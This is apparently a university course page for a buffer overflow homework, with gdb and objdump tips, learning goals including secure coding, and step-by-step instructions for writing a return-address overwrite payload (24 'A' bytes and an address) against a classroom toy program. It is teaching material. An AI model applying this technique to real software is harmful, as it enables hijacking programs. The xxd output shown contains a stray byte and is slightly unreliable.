Buffer overflow attack
Unlike all of the other assignments, the information about HW13 was sent entirely by email. Text from those emails is copied below, for convenience.
Requirements
HW13. For HW13, please submit three files: input.txt, boa.c, boa (executable). Most likely, we will only look at input.txt. Running ./boa < input.txt should cause it to call scare_visitor(..), and thus print "BRAH!!!". First, follow along with the instructions in Dr. Kak's article using his example. Then, then apply the same principle to the boa.c example we have used in class. (Run 264get hw13 to get it.)
This hasn't been posted yet, butthat's all there is to it.
How much work is this?
Time-wise, my general estimate would be about 2 hours reading Dr. Kak's notes (assigned 12/2), 1-2 hours reading the two short articles sent yesterday, 30 mins on exercise #1, and 1-2 hours on HW13 (due this Sat 12/12).
Required readings
Please read pages 6 to 43 of Prof. Kak's notes on buffer overflow attacks by Tue 12/8. You can skim the case studies on pages 8-14, but make sure you understand the basic idea of what went wrong. You should come away understanding why buffer overflows are such a treacherous kind of bug, how they work, how they could be exploited by malicious attackers, and how you can write secure code that resists such attacks.
Please read the following for class tomorrow (12/10/2015). This is ≈7 pages in total.
- Understanding C by learning assembly (required, except for the part on static local variables)
- Introduction to x64 assembly language (required, except for the part on about directives on page 2 left side)
More information
Backtrace. The addresses listed by gdb in the backtrace (e.g., 0x400558 and 0x4005f8) are for the next instruction to be executed in those functions, not the beginning of those functions. main() begins at 0x4005d8. greet_visitor() begins at 0x400554. You will also find the address 0x400470, which is for _start(), a part of the "load system" that calls your main function.
From class. Here are a few things I referred to in class yesterday (Tue 12/8):
- Stack frame layout on x86-64 (optional; read only if you find it necessary to understand) – explains x64 stack frame in the context of explaining how registers are used to optimize argument passing in a function call
- To compile without optimizations or debugging symbols (needed for gdb):
/usr/bin/gcc boa.c -o boa -O0 # that's "minus capital-letter-O digit-zero"
The -O0 turns off all optimizations so that the instructions will more closely generate our C code. Calling gcc as /usr/bin/gcc sidesteps our usual alias that adds the debugging symbols (needed for gdb). Actually, this would probably work even with the debugging symbols, so just the -O0 is probably acceptable.
- "AMD64" is also known as "x64" and "x86-64". They are synonyms for the same CPU architecture.
- The stack grows down on AMD64. That means the address of the local variables of a callee will be less than the address of the caller's local variables.
- The stack pointer gives the memory address of the "end" of the stack. Thus, with each function call, the system subtracts from the stack pointer.
- gdb commands (Many of these only work while the program is running, i.e., while stopped for a breakpoint.)
- info registers
- info proc mappings
- x/128bx $sp # display 128 bytes of the stack, starting at the end (stack pointer)
(optional) For those who are curious. If you wish to play with the boa program in gdb before tomorrow, you might also find the following useful:
- gdb commands
- disassemble greet_visitor # shows the assembly instructions for greet_visitor()
- disassemble main # shows the assembly instructions for main()
- stepi (si) and nexti (ni) are just like step (s) and (n) except that they step by assembly instructions instead of C code lines
- View assembly instructions for any binary executable
- objdump -S --disassemble boa # convert the binary code back to assembly and display on the command line
- Dig around to find your main() and greet_visitor() or whatever you are looking for. Never mind the rest.
- Have gcc output assembly instructions instead of a binary executable
- /usr/bin/gcc boa.c -O0 -o boa.s # -S tells it to output assembly; .s is an extension for assembly files
- Running objdump on an existing binary has the advantage that it tells you the instruction addresses
What you need to know
Things you need to know from this week
- What happens under the hood when we call a function in C?
- What is the overall process?
- What happens with the stack?
- What is the role of the registers?
- rip – aka $pc, instruction pointer, program counter, IP, PC
- rsp - aka $sp, stack pointer
- rbp - aka base pointer, frame pointer
- general purpose – e.g., rdi, rsi, rdx, rcx, r8, …, r15
- What happens in the prologue and epilogue of a function?
- How are assembly instructions different from C code?
- What kinds of operations do assembly instructions do?
- What do the following categories of instructions do?
- jump, call, return, arithmetic, push, pop, move, arithmetic
- How do buffer overflow/overread attacks work?
- How does an attacker perpetrate an attack?
- simple buffer overflow
- simple buffer overread
- What is the role of a debugger (i.e., gdb)?
- How can you write C code that is resistant to such attacks?
- ... only as these apply to the x64 (aka AMD64, x86-64) architecture
Things you do NOT need to know (yet)
- syntax of any specific instruction
- size of particular registers
- how to write programs in assembly language
- directives (.intel_syntax)
- any architecture other than AMD-64 on Linux
Q&A
-
Can you give an illustration of how function calls work?
I made this example:
https://engineering.purdue.edu/ece264/15au/static/stack_example.pdf
Some of the details in the stack frame for main() seem to contradict my understanding about calling x64 conventions. I suspect main() may be a special case, since it gets called by the load system. At any rate, your task for HW13 is not related to main() so it shouldn't be an issue. You can see anything in that example for yourself by simply creating breakpoints and using the commands discussed in class (and given in the earlier email).
-
How do I create the input.txt file?
This was posted on Blackboard:Recommended method: vim -b and Ctrl-v x ░ ░Here's the method I showed in class. I find this the easiest. In this example, I'll show how to create the string used in Dr. Kak's notes (page 42).
-
Open a file called input.txt in vim, in binary mode.
vim -b input.txt
- Press i to start inserting characters.
- Press A 24 times to enter "AAAAAAAAAAAAAAAAAAAAAAAA".
- Press Ctrl-v x 8 e to enter the character 0x8e.
- Press Ctrl-v x 0 6 to enter the character 0x06.
- Press Ctrl-v x 4 0 to enter the character 0x40.
- Press Ctrl-v x 0 0 to enter the character 0x00.
Alternative method: xxd -r
If you don't like that method, another option is to create a hex dump in the format of xxd, and then use xxd -r input.hexdump > input.txt and redirect the output to input.txt.
-
Open a file called input.hexdump in vim
vim -b input.hexdump
-
Enter the following:
0000000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
0000010: 41 41 41 41 41 41 41 41 8e 06 40 00 -
Use xxd -r to reverse it and create your input.txt.
xxd -r input.hexdump > input.txt
Either way you should end up with a file called input.txt that, when viewed with xxd -g1, contains the following:
0000000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0000010: 41 41 41 41 41 41 41 41 c2 8e 06 40 00 0a AAAAAAAA...@..
I hope that helps.
-
Open a file called input.txt in vim, in binary mode.